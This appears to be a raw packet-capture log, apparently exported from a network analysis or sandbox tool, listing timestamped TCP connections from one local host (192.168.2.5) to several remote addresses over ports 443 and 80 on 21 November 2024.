                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.865737915 CET4434988640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.910259008 CET49896443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.910314083 CET4434989640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.910404921 CET49896443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.910617113 CET49896443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.910635948 CET4434989640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.960802078 CET4434988913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.960861921 CET4434988913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.960941076 CET49889443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.961148977 CET49889443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.961148977 CET49889443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.961188078 CET4434988913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.961213112 CET4434988913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.963960886 CET49897443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.963975906 CET4434989713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.964040041 CET49897443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.964199066 CET49897443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.964207888 CET4434989713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.999833107 CET4434988720.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.000032902 CET4434988720.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.000108957 CET49887443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.000437021 CET49887443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.000437021 CET49887443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.000463963 CET4434988720.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.000530005 CET49887443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.073734999 CET4434988820.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.074007034 CET4434988820.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.074094057 CET49888443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.074238062 CET49888443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.074260950 CET4434988820.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.074269056 CET49888443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.074660063 CET49888443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.158900976 CET4434989113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.165093899 CET49891443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.165139914 CET4434989113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.165740967 CET49891443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.165754080 CET4434989113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.224837065 CET4434989213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.225399971 CET49892443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.225441933 CET4434989213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.225922108 CET49892443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.225929022 CET4434989213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.240202904 CET4434989013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.240602016 CET49890443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.240619898 CET4434989013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.241121054 CET49890443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.241126060 CET4434989013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.325268984 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.325375080 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.338809013 CET4434989320.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.339087009 CET49893443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.339122057 CET4434989320.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.340584993 CET4434989320.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.340658903 CET49893443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.340980053 CET49893443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.341069937 CET4434989320.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.341244936 CET49893443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.341310024 CET49893443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.341332912 CET4434989320.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.354047060 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.392626047 CET49893443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.394855022 CET4434989413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.395317078 CET49894443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.395337105 CET4434989413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.395814896 CET49894443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.395823002 CET4434989413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.474906921 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.611552000 CET4434989113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.611620903 CET4434989113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.611816883 CET49891443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.611962080 CET49891443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.611995935 CET4434989113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.612021923 CET49891443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.612035990 CET4434989113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.615302086 CET49898443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.615343094 CET4434989813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.615431070 CET49898443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.615689993 CET49898443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.615701914 CET4434989813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.675834894 CET4434989213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.675987959 CET4434989213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.676162958 CET49892443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.676249981 CET49892443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.676270008 CET4434989213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.676281929 CET49892443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.676287889 CET4434989213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.679888964 CET49899443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.679940939 CET4434989913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.680210114 CET49899443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.680391073 CET49899443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.680409908 CET4434989913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.697524071 CET4434989013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.697593927 CET4434989013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.697740078 CET49890443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.697798014 CET49890443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.697830915 CET4434989013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.697859049 CET49890443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.697874069 CET4434989013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.700104952 CET49900443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.700141907 CET4434990013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.700267076 CET49900443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.700361013 CET49900443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.700373888 CET4434990013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.811606884 CET4434989520.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.811923027 CET49895443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.811958075 CET4434989520.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.813024044 CET4434989520.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.813093901 CET49895443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.813541889 CET49895443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.813616037 CET4434989520.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.813760042 CET49895443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.813836098 CET49895443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.813873053 CET4434989520.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.816627026 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.816694975 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.821005106 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.841865063 CET4434989413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.841912031 CET4434989413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.841980934 CET49894443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.842253923 CET49894443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.842299938 CET4434989413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.842328072 CET49894443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.842343092 CET4434989413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.845541000 CET49902443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.845577955 CET4434990213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.845650911 CET49902443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.845978022 CET49902443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.845993042 CET4434990213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.855736971 CET4434989320.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.855840921 CET4434989320.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.856307030 CET49893443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.856342077 CET4434989320.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.856364965 CET49893443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.856481075 CET49893443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.861383915 CET49895443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.942107916 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.942204952 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:50.942421913 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.063281059 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.359919071 CET4434989520.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.360027075 CET4434989520.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.360116005 CET49895443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.360519886 CET49895443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.360553980 CET4434989520.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.360590935 CET49895443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.360615969 CET49895443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.704571009 CET4434989640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.705626965 CET49896443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.705643892 CET4434989640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.706573009 CET49896443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.706578016 CET4434989640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.706605911 CET49896443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.706614971 CET4434989640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.816386938 CET4434989713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.816881895 CET49897443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.816890955 CET4434989713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.817354918 CET49897443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:51.817358971 CET4434989713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.102576017 CET44349824172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.102647066 CET44349824172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.102823019 CET49824443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.178257942 CET44349823172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.178420067 CET44349823172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.178495884 CET49823443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.275120020 CET4434989713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.275203943 CET4434989713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.275365114 CET49897443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.276046038 CET49897443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.276065111 CET4434989713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.276076078 CET49897443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.276082039 CET4434989713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.279273033 CET49904443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.279293060 CET4434990413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.279350042 CET49904443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.279541016 CET49904443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.279553890 CET4434990413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357429981 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357532978 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357584953 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357620955 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357656956 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357676983 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357692003 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357705116 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357728004 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357762098 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357786894 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357795954 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357830048 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357846975 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357866049 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357868910 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.357975006 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.420234919 CET4434989813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.421089888 CET49898443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.421104908 CET4434989813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.421688080 CET49898443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.421693087 CET4434989813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.433190107 CET4434989640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.433206081 CET4434989640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.433372974 CET4434989640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.433382988 CET49896443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.433418036 CET4434989640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.433473110 CET49896443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.433903933 CET49896443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.433904886 CET49896443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.433923006 CET4434989640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.434077978 CET4434989640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.434108973 CET4434989640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.434165955 CET49896443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.476295948 CET4434989913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.476944923 CET49899443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.476974010 CET4434989913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.477484941 CET49899443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.477492094 CET4434989913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.477550983 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.477621078 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.477659941 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.477706909 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.487946987 CET44349826172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.488013983 CET44349826172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.488260984 CET49826443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.490442038 CET4434990013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.490937948 CET49900443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.490948915 CET4434990013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.491429090 CET49900443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.491434097 CET4434990013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.539644003 CET49905443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.539671898 CET4434990540.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.539741039 CET49905443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.539889097 CET49905443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.539896965 CET4434990540.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.558973074 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.559061050 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.559079885 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.559135914 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.563183069 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.563221931 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.563424110 CET44349825172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.563448906 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.563581944 CET44349825172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.563669920 CET49825443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.571712017 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.571732998 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.571784973 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.571820021 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.580010891 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.580086946 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.580100060 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.580495119 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.588526964 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.588597059 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.588665009 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.596847057 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.596975088 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.597050905 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.605321884 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.605422974 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.605807066 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.613827944 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.613868952 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.613902092 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.613930941 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.622302055 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.622339010 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.622376919 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.622407913 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.623867035 CET44349827172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.624043941 CET44349827172.64.41.3192.168.2.5
